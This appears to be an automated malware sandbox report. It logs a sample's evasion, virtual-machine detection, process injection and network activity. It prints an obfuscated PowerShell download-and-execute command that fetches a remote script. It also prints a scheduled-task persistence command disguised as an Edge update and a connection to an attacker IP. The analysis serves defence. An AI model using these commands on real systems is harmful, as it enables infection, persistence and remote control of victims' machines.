Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 2900000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1AF50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 25B0000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1ADB0000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1ED0000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1A390000 memory reserve | memory write watch
Contains functionality to detect virtual machines (STR)
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF958E5 str word ptr [ebp-65h] 8_2_1BF958E5
Contains functionality to query network adapater information
Source: C:\Windows\System32\dllhost.exe Code function: GetAdaptersInfo, 15_2_000001E879D82AC4
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4309 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5548 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6255 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3454 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 458 Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 3866 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2397
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 9751
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\ajbs50ul.bat Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\miEk.ini Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\u0ow.ini Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\System32\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\Public\ajbs50ul.bat API coverage: 1.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep count: 4309 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep count: 5548 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 6255 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep count: 3454 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 8132 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 7984 Thread sleep time: -773200s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep count: 7300 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 Thread sleep count: 2397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3184 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2024 Thread sleep count: 9751 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 2016 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1832 Thread sleep count: 109 > 30
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177540F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 4_2_00007FF7177540F0
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D022D0 GetSystemInfo,VirtualAlloc, 14_2_0000023D20D022D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Source: powershell.exe, 00000003.00000002.1598016923.000001CB636B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_p
Source: OpenWith.exe, 0000000C.00000003.1670918605.0000022BF7A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink
Source: powershell.exe, 00000003.00000002.1598016923.000001CB63660000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5~
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000C.00000003.1670918605.0000022BF7A28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000008.00000002.1561583400.000000001BF92000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: qemu&
Source: OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: utox_x86_x64.exe, 00000009.00000002.2601294216.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717752CF0 GetProcessHeap,HeapAlloc, 4_2_00007FF717752CF0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717701180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 4_2_00007FF717701180
Source: C:\Users\Public\ajbs50ul.bat Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7456.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: 8.2.regsvr32.exe.2f73d50.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 8.2.regsvr32.exe.2f73d50.1.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 8.2.regsvr32.exe.2f73d50.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Allocates memory in foreign processes
Source: C:\Program Files\Windows Media Player\wmpshare.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1E879D80000 protect: page read and write
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\Public\ajbs50ul.bat NtWriteFile: Indirect: 0x7FF717757076 Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\regsvr32.exe Thread register set: 7908 5 Jump to behavior
Writes to foreign memory regions
Source: C:\Program Files\Windows Media Player\wmpshare.exe Memory written: C:\Windows\System32\dllhost.exe base: 1E879D80000
Source: C:\Program Files\Windows Media Player\wmpshare.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF733CD14E0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
